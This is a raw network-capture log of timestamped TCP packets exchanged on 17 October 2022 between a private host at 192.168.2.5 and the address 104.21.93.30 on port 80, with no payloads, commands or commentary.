                                                                                                                                  Oct 17, 2022 22:06:38.425295115 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425302982 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425312042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425338984 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425400972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425829887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425857067 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425874949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425893068 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425909996 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425926924 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425945044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425970078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.425968885 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.425988913 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.426011086 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.426012039 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.426033974 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.426039934 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.426062107 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.426064968 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.426084042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.426105022 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.426105976 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.426125050 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.426141977 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.426145077 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.426182032 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.466815948 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.466855049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.466892958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.466938972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468261003 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468301058 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468329906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468343973 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468354940 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468379974 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468379974 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468404055 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468425989 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468429089 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468453884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468477011 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468480110 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468502998 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468524933 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468528986 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468552113 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468575001 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468576908 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468600988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468621969 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468626976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468650103 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468669891 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468674898 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468698025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468719959 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468723059 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468745947 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468766928 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468770981 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468795061 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468815088 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468820095 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468844891 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468868971 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468869925 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468892097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468911886 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468915939 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468939066 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468962908 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.468964100 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468987942 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.468997955 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469013929 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469039917 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469067097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469068050 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469090939 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469115019 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469115973 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469140053 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469150066 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469171047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469192982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469214916 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469218016 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469242096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469261885 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469268084 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469290972 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469312906 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469316006 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469338894 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469362020 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469366074 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469387054 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469409943 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469412088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469435930 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469460011 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469463110 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469485044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469511986 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469513893 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469563007 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469711065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469737053 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469759941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469784975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469786882 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469809055 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469830990 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469832897 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469856024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469866991 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469881058 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469902992 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469928026 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469927073 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469950914 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469964027 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.469976902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.469999075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470010996 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470025063 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470046997 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470066071 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470072031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470097065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470118046 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470122099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470144987 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470169067 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470187902 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470192909 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470211983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470216036 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470232010 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470510006 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470535994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470554113 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470562935 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470587015 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470597029 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470611095 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470633984 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470657110 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470658064 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470681906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470688105 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470705986 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470730066 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470745087 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470758915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470781088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470792055 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470807076 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470829964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470841885 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470855951 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470892906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470896006 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470917940 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470941067 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.470963001 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.470966101 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471002102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471013069 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471028090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471050978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471061945 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471075058 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471097946 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471110106 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471122980 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471155882 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471465111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471491098 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471514940 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471532106 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471541882 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471565962 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471585989 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471592903 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471616983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471641064 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471641064 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471663952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471688032 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471688986 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471710920 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471730947 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471735954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471760988 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471785069 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471786022 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471808910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471832991 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471846104 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471856117 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471879005 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471880913 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471904993 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471914053 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471929073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471951008 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471961975 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.471976995 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.471999884 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472009897 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472024918 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472048044 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472060919 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472443104 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472469091 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472492933 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472498894 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472517967 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472537041 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472543001 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472567081 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472590923 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472593069 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472616911 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472628117 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472641945 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472666979 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472677946 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472692966 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472718000 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472744942 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472749949 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472768068 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472779989 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472795010 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472819090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472841024 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472842932 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472867966 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472893000 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472893953 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472918034 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472942114 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472948074 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472964048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.472985029 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.472987890 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473012924 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473023891 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473037958 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473088980 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473519087 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473548889 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473573923 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473596096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473622084 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473623037 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473644972 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473647118 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473670959 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473695993 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473699093 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473720074 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473726988 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473742962 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473766088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473789930 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473792076 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473814964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473834991 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473840952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473865986 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473885059 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473890066 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473915100 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473937035 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473938942 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473963976 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.473987103 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.473989010 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474013090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474035025 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.474039078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474065065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474087000 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.474090099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474113941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474137068 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.474376917 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474402905 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474427938 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474430084 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.474452019 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474472046 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.474478960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.474498987 CEST8049692104.21.93.30192.168.2.5
